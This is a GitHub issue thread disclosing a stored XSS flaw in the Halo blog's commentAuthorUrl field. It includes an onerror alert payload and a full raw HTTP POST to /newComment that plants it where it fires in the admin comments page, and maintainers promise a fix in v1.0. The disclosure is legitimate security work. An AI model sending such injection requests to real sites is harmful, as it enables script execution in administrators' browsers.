### ISSUE TITLE
These is Another stored xss vulnerability

### ISSUE THREAD

**Issue by Artemis1029** [halo-dev/halo#127]
**我确定我已经查看了** (标注`[ ]`为`[x]`)

- [x] [Halo 使用文档](https://docs.halo.run/)
- [x] [Github Wiki 常见问题](https://github.com/ruibaby/halo/wiki/4.-%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98)
- [x] [其他 Issues](https://github.com/ruibaby/halo/issues)

----

**我要申请**  (标注`[ ]`为`[x]`)

- [x] BUG 反馈
- [ ] 添加新的特性或者功能
- [ ] 请求技术支持

## Bug Report

I find that You have do HtmlUtil.escape for CommentContent
![图片](https://user-images.githubusercontent.com/26483211/55527086-22476e80-56ca-11e9-9953-d30d7b609a83.png)
but do nothing with CommentAuthorUrl
![图片](https://user-images.githubusercontent.com/26483211/55527337-2d4ece80-56cb-11e9-816f-d00e281afd43.png)

payload:`commentAuthorUrl="><img src=1 onerror=alert(123)>`\
<img width="902" alt="图片" src="https://user-images.githubusercontent.com/26483211/55527127-4440f100-56ca-11e9-93a3-58726ea901de.png">
```http
POST /newComment HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 306
Connection: close
Cookie: JSESSIONID=
X-Forwarded-For: 127.0.0.2

postId=3&commentContent=sasas&commentAuthor=as12%22%3E%3Ca%3E3&commentAuthorEmail=&commentAuthorUrl=%22%3E%3Cimg+src%3D1+onerror%3Dalert(123)%3E233&commentAgent=Mozilla%2F5.0+(Windows+NT+10.0%3B+Win64%3B+x64)+AppleWebKit%2F537.36+(KHTML%2C+like+Gecko)+Chrome%2F73.0.3683.47+Safari%2F537.36&commentParent=28
```
in uri `/admin/comments?status=1`
<img width="1406" alt="图片" src="https://user-images.githubusercontent.com/26483211/55527020-ea402b80-56c9-11e9-9899-cfd577514b9c.png">

**Comment by JohnNiang** [comment]
非常感谢您的漏洞反馈！我们将在 v1.0 版本进行修复。

**Comment by ruibaby** [comment]
准备发布 v1，所以关闭该 issue。
